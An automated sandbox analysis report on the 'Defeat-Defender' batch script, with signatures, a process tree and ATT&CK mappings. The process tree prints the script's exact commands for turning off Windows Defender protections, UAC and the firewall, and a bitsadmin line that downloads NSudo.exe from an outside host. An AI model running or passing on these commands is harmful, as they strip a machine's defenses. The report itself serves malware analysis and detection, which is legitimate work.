Analysis
max time kernel: 149s
max time network: 148s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 06-08-2024 19:33

Static task: static1

Behavioral task: behavioral1
  Sample: Defeat-Defender-V1.2.0-main/Defeat-Defender.bat
  Resource: win7-20240729-en
Behavioral task: behavioral2
  Sample: Defeat-Defender-V1.2.0-main/Defeat-Defender.bat
  Resource: win10v2004-20240802-en
Behavioral task: behavioral3
  Sample: Defeat-Defender-V1.2.0-main/Enable Smart Screen.bat
  Resource: win7-20240704-en
Behavioral task: behavioral4
  Sample: Defeat-Defender-V1.2.0-main/Enable Smart Screen.bat
  Resource: win10v2004-20240802-en
Behavioral task: behavioral5
  Sample: Defeat-Defender-V1.2.0-main/run.bat
  Resource: win7-20240729-en
Behavioral task: behavioral6
  Sample: Defeat-Defender-V1.2.0-main/run.bat
  Resource: win10v2004-20240802-en
General
Target: Defeat-Defender-V1.2.0-main/Defeat-Defender.bat
Size: 3KB
MD5: 123c7ff359911f5a6bd2cce3f44d68e7
SHA1: b0a06f3acd65df1b019e0f8b3e5df81f38bfe06d
SHA256: d0684a4f8a1dde0fefa5272d38fd96c21388f0398beff1a2847ff0c021611068
SHA512: c164cdba208e518fad16cdd889eabd9128d82b1711aad773ecfe923296a7faef73a8da801ef12f973bd6bd7d76c871d3a3c8765b5e39919315a0eee4d5bf76c2
Malware Config

Signatures

Processes (description / ioc / process):
  Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (powershell.exe)

Processes (pid / process):
  3948 powershell.exe, 2312 powershell.exe, 1580 powershell.exe, 3848 powershell.exe, 4928 powershell.exe, 4000 powershell.exe, 4544 powershell.exe, 2352 powershell.exe, 464 powershell.exe, 436 powershell.exe

Download via BitsAdmin (1 TTPs, 1 IoCs)

Modifies Windows Firewall (2 TTPs, 1 IoCs)
Processes (pid / process):
  3096 netsh.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)

Event Triggered Execution: Netsh Helper DLL (1 TTPs, 3 IoCs)
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes (description / ioc / process):
  Key opened: \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (netsh.exe)
  Key queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (netsh.exe)
  Key value enumerated: \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (netsh.exe)

Checks processor information in registry (2 TTPs, 11 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes (description / ioc / process):
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz (firefox.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (firefox.exe)
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (EXCEL.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (EXCEL.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision (firefox.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier (firefox.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz (firefox.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (EXCEL.EXE)
  Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (firefox.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature (firefox.exe)
  Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (firefox.exe)

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes (description / ioc / process):
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS (EXCEL.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily (EXCEL.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (EXCEL.EXE)

Modifies registry class (1 IoCs)
Processes (description / ioc / process):
  Key created: \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings (firefox.exe)

Suspicious behavior: AddClipboardFormatListener (1 IoCs)
Processes (pid / process):
  4600 EXCEL.EXE

Suspicious behavior: EnumeratesProcesses (22 IoCs)
Processes (pid / process), each listed twice:
  464 powershell.exe, 436 powershell.exe, 4876 powershell.exe, 2352 powershell.exe, 3948 powershell.exe, 2312 powershell.exe, 1580 powershell.exe, 3848 powershell.exe, 4928 powershell.exe, 4000 powershell.exe, 4544 powershell.exe

Suspicious use of AdjustPrivilegeToken (13 IoCs)
Processes (description / pid / process):
  Token: SeDebugPrivilege for powershell.exe PIDs 464, 436, 4876, 2352, 3948, 2312, 1580, 3848, 4928, 4000, 4544
  Token: SeDebugPrivilege for firefox.exe PID 2640 (listed twice)

Suspicious use of FindShellTrayWindow (25 IoCs)
Processes (pid / process):
  2640 firefox.exe (25 entries)

Suspicious use of SendNotifyMessage (24 IoCs)
Processes (pid / process):
  2640 firefox.exe (24 entries)

Suspicious use of SetWindowsHookEx (13 IoCs)
Processes (pid / process):
  4600 EXCEL.EXE (12 entries), 2640 firefox.exe (1 entry)

Suspicious use of WriteProcessMemory (64 IoCs)
Processes (source pid / process -> target pid / process), each cmd.exe and powershell.exe pair listed twice:
  4824 cmd.exe -> 3708 cacls.exe
  4824 cmd.exe -> 1624 wscript.exe
  4824 cmd.exe -> 4144 bitsadmin.exe
  4824 cmd.exe -> 464 powershell.exe
  4824 cmd.exe -> 436 powershell.exe
  4824 cmd.exe -> 4876 powershell.exe
  4824 cmd.exe -> 2352 powershell.exe
  4824 cmd.exe -> 3948 powershell.exe
  4824 cmd.exe -> 2312 powershell.exe
  4824 cmd.exe -> 1580 powershell.exe
  4824 cmd.exe -> 3848 powershell.exe
  4824 cmd.exe -> 4928 powershell.exe
  4824 cmd.exe -> 4000 powershell.exe
  4824 cmd.exe -> 4544 powershell.exe
  4544 powershell.exe -> 3096 netsh.exe
  4532 firefox.exe -> 2640 firefox.exe (repeated entries)
  2640 firefox.exe -> 768 firefox.exe (repeated entries)

Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes (process tree; [n] is the depth in the tree)

[1] C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\Defeat-Defender.bat"
    PID: 4824
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\system32\cacls.exe
      Command line: "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
      PID: 3708

  [2] C:\Windows\system32\wscript.exe
      Command line: wscript C:\Users\Admin\AppData\Local\Temp\tmp.vbs
      PID: 1624

  [2] C:\Windows\system32\bitsadmin.exe
      Command line: bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe
      PID: 4144
      - Download via BitsAdmin

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""
      PID: 464
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
      PID: 436
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
      PID: 4876
      - UAC bypass
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
      PID: 2352
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell.exe -command "Set-MpPreference -PUAProtection disable"
      PID: 3948
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
      PID: 2312
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
      PID: 1580
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
      PID: 3848
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
      PID: 4928
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
      PID: 4000
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell.exe -command "netsh advfirewall set allprofiles state off"
      PID: 4544
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\netsh.exe
        Command line: "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
        PID: 3096
        - Modifies Windows Firewall
        - Event Triggered Execution: Netsh Helper DLL

[1] C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Documents\RestoreAdd.xlsx"
    PID: 4600
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of SetWindowsHookEx

[1] C:\Windows\System32\rundll32.exe
    Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    PID: 4800

[1] C:\Program Files\Mozilla Firefox\firefox.exe
    Command line: "C:\Program Files\Mozilla Firefox\firefox.exe"
    PID: 4532
    - Suspicious use of WriteProcessMemory

  [2] C:\Program Files\Mozilla Firefox\firefox.exe
      Command line: "C:\Program Files\Mozilla Firefox\firefox.exe"
      PID: 2640
      - Checks processor information in registry
      - Modifies registry class
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory

    [3] C:\Program Files\Mozilla Firefox\firefox.exe
        Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1996 -parentBuildID 20240401114208 -prefsHandle 1912 -prefMapHandle 1904 -prefsLen 23602 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {60673b37-9128-4018-9bd8-d6073175fef9} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" gpu
        PID: 768

    [3] C:\Program Files\Mozilla Firefox\firefox.exe
        Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2408 -parentBuildID 20240401114208 -prefsHandle 2400 -prefMapHandle 2396 -prefsLen 23638 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0634ca4-ec5b-462c-b5df-fa7b30041b7e} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" socket
        PID: 4692

    [3] C:\Program Files\Mozilla Firefox\firefox.exe
        Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2992 -childID 1 -isForBrowser -prefsHandle 2916 -prefMapHandle 2968 -prefsLen 23779 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cfc42829-52e8-4f35-93a7-c59cbeaf1372} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab
        PID: 3228

    [3] C:\Program Files\Mozilla Firefox\firefox.exe
        Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2744 -childID 2 -isForBrowser -prefsHandle 3700 -prefMapHandle 3696 -prefsLen 29012 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fa8c8459-94e9-49ef-b2d8-0c6251b42a25} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab
        PID: 4980

    [3] C:\Program Files\Mozilla Firefox\firefox.exe
        Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4712 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4716 -prefMapHandle 4756 -prefsLen 29012 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {46d0ee7c-afd8-4d62-a74f-ee81124ea5d6} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" utility
        PID: 5580
        - Checks processor information in registry

    [3] C:\Program Files\Mozilla Firefox\firefox.exe
        Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5460 -childID 3 -isForBrowser -prefsHandle 5452 -prefMapHandle 5448 -prefsLen 27068 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {11539aa5-ffc0-469e-ae2a-70d5f5ee2b4a} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab
        PID: 6092

    [3] C:\Program Files\Mozilla Firefox\firefox.exe
        Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5640 -childID 4 -isForBrowser -prefsHandle 5560 -prefMapHandle 5564 -prefsLen 27068 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b214495-18e7-4d1e-8ab2-67ba649de502} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab
        PID: 6104

    [3] C:\Program Files\Mozilla Firefox\firefox.exe
        Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5764 -childID 5 -isForBrowser -prefsHandle 5760 -prefMapHandle 5768 -prefsLen 27068 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc444eed-2e08-408a-8efa-d3f1868ae8d4} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab
        PID: 448

    [3] C:\Program Files\Mozilla Firefox\firefox.exe
        Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5972 -childID 6 -isForBrowser -prefsHandle 5996 -prefMapHandle 5992 -prefsLen 27211 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec55a889-6c6b-46a5-a0e9-fbd754832f4b} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab
        PID: 5480
Network

MITRE ATT&CK Enterprise v15

Persistence
- BITS Jobs (1)
- Create or Modify System Process (1): Windows Service (1)
- Event Triggered Execution (1): Netsh Helper DLL (1)

Privilege Escalation
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Create or Modify System Process (1): Windows Service (1)
- Event Triggered Execution (1): Netsh Helper DLL (1)
Downloads